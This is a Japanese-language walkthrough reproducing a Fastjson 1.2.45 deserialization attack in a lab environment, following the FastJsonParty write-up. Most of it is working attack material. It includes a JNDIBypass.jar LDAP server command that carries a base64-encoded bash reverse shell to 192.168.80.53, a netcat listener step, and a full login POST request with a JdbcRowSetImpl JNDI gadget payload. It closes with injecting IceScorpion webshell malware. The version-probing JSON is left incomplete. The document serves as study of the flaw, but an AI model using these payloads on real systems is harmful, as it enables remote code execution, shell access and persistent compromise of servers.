脆弱性の利用#
参考:https://github.com/lemono0/FastJsonParty/blob/main/1247-waf-c3p0/write-up.md
プロセスの再現を主に行い、脆弱性の利用プロセスを理解します。ネット上には多くの専門家の記事があり、非常に良く書かれていますが、基礎学習としてはまだ不十分です(特に IDEA を使って Java ファイルをコンパイルする方法や、依存関係などの基本的な問題の解決方法について、-__-|.)。そこで、自分の再現プロセスの流れを書き留めます。
ログイン時にパケットをキャプチャし、リクエストパケットは以下の通りです:
エラーメッセージの理解バージョン
{
"@type": "java.lang.AutoCloseable"
fastjson のバージョンは 1.2.45 です。
著者の説明によると、JDK の高バージョンを回避する必要があるため、著者の JNDIBypass.jar ツールを使用します。
JNDIBypass.jar ファイルを使用して ldap サービスを起動します。
java -jar .\JNDIBypass.jar -a 192.168.80.53 -p 1389 -c "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44MC41My8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"
nc をリッスンします。
パケットを送信します。
POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 262
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.80.53:1389/jpiuw",
"autoCommit":true
}
}
シェルが返されます。
java -jar .\JNDIBypass.jar -h
IceScorpion マルウェアを注入します。
接続します。
